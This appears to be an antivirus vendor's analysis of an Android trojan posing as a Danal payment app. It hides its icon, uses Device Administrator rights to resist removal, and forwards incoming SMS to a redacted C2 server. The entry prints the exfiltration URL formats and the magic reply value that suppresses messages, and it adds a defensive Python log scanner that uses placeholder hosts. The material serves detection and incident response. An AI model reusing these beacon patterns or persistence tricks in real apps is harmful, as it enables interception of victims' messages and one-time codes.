Android/SMSSpy.F!tr.spy
Analysis
Android/SMSSpy.F!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as a mobile payment service application by Danal Corp. However, in the background, it spies on incoming SMS messages on the victim's phone and forwards them to the attacker's server.
Technical Details
The main application is called "Danal" (ref Fig1) and comes in the package "korean.alyac.view"
Fig1 : The application icon
When launched for the first time, the application asks the user for Device Administrator permissions (ref Fig2).
Fig2 : Device Administrator Rights request
If the user clicks on 'Activate', the application cannot be uninstalled until its Device Administrator privileges have been deactivated.
If the user clicks on 'Cancel', nothing visible happens.
In both cases, the application then returns to the device's main menu, from which the application icon has been removed, so the victim has no visible indication that it is still installed.
However, in the background, the following malicious functions are performed:
- When started, it registers the victim's phone with the attacker's server by sending a request to
"http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&type=join"
- Next, whenever an SMS message is received on the victim's phone, it is forwarded to
"http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&send=" + [SMS_SENDER_NUMBER] + "&surak=" + [PHONE_NUMBER] + "&memo=" + [MESSAGE_BODY, UTF-8 encoded] + "&type=memo&xcode=1"
- Right after, another request is sent to
"http://XXX.XXX.XX.140/" + "check.php?phone=" + [PHONE_NUMBER]
- If the server's response to this request is "219083", the SMS is suppressed so that it stays hidden from the victim; the attacker therefore decides per victim whether forwarded messages (for example one-time codes) are also withheld from the phone's owner.
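The three request shapes above are stable enough to detect on a web proxy even though the C2 address is redacted in this report. The following helper is an added example written for this page, not Fortinet's code or the malware's own: it parses constructed proxy-log lines, classifies each URL by the query-string signature of the join, memo and check.php beacons, reconstructs the SMS content that was exfiltrated, and flags a host as suspected C2 once a client has sent it both a registration and a forwarded message. The log line layout, the client address and the phone numbers are all assumptions, and the host 203.0.113.140 is a documentation-range placeholder standing in for the redacted XXX.XXX.XX.140.

```python
"""Detection helper for the SMSSpy.F beacon traffic described above.

Added example, not code from the original report. Matching is done on the
query parameters rather than the C2 host, because the host is redacted.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Assumed proxy-log layout: "<time> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)

# Constructed sample lines. 203.0.113.140 is a TEST-NET-3 placeholder for the
# redacted C2 address; phone numbers and the client address are made up.
SAMPLE_LOG = [
    "10:00:01 10.0.0.5 GET http://203.0.113.140/?phone=%2B821012345678&type=join 200",
    "10:02:17 10.0.0.5 GET http://203.0.113.140/?phone=%2B821012345678"
    "&send=%2B821099998888&surak=%2B821012345678"
    "&memo=Your+verification+code+is+483920&type=memo&xcode=1 200",
    "10:02:18 10.0.0.5 GET http://203.0.113.140/check.php?phone=%2B821012345678 200",
    "10:03:40 10.0.0.5 GET https://www.example.com/index.html 200",
]


def classify_request(url):
    """Return (kind, details) for a URL matching one of the three beacons, else None."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
    phone = q.get("phone", [None])[0]
    if phone is None:
        return None
    # Registration: GET / ?phone=<victim>&type=join
    if q.get("type") == ["join"] and parts.path in ("", "/"):
        return ("join", {"phone": phone})
    # Forwarded SMS: ...&send=<sender>&surak=<victim>&memo=<body>&type=memo&xcode=1
    if q.get("type") == ["memo"] and q.get("xcode") == ["1"] and "surak" in q and "memo" in q:
        return ("memo", {"phone": phone, "sender": q.get("send", [""])[0], "body": q["memo"][0]})
    # Hide-or-show poll: GET /check.php?phone=<victim>
    if parts.path.endswith("/check.php"):
        return ("check", {"phone": phone})
    return None


def scan_log(lines):
    """Parse log lines and return one finding dict per matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("url"))
        if hit is None:
            continue
        kind, details = hit
        findings.append({"client": m.group("client"),
                         "host": urlsplit(m.group("url")).netloc,
                         "kind": kind, **details})
    return findings


def leaked_messages(findings):
    """(sender, body) pairs the implant forwarded, recovered from the memo beacons."""
    return [(f["sender"], f["body"]) for f in findings if f["kind"] == "memo"]


def suspected_c2_hosts(findings):
    """Hosts that received both a join and a memo beacon from the same client."""
    kinds_by_pair = {}
    for f in findings:
        kinds_by_pair.setdefault((f["client"], f["host"]), set()).add(f["kind"])
    return sorted({host for (_, host), kinds in kinds_by_pair.items() if {"join", "memo"} <= kinds})


def response_hides_sms(body):
    """True when a check.php reply is the magic value that makes the implant hide the SMS."""
    return body.strip() == "219083"


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("leaked:", leaked_messages(found))
    print("suspected C2:", suspected_c2_hosts(found))
```

Because parse_qs percent-decodes, the reconstructed memo body is the plaintext the attacker received, which is what an incident responder needs when deciding which one-time codes or accounts were exposed. Keying the C2 verdict on the join-plus-memo pair from one client keeps a single stray `?phone=` hit on an unrelated site from raising an alert.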
Permissions required by the application (duplicate entries removed):
- RECEIVE_SMS
- INTERNET
- ACCESS_NETWORK_STATE
- SEND_SMS
- RECEIVE_BOOT_COMPLETED
- READ_PHONE_STATE
- ACCESS_FINE_LOCATION
- ACCESS_COARSE_LOCATION
- ACCESS_MOCK_LOCATION
- WRITE_EXTERNAL_STORAGE
- VIBRATE
- FLASHLIGHT
- MOUNT_UNMOUNT_FILESYSTEMS
- CAMERA
- WAKE_LOCK
- RECORD_AUDIO
Recommended Action
FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
- On an infected handset, deactivate the application's Device Administrator entry in the Android security settings before attempting removal; while the entry is active the package cannot be uninstalled.
Detection Availability

Product | Signature database
---|---
FortiGate | Extended
FortiClient | Extreme
FortiAPS |
FortiAPU |
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |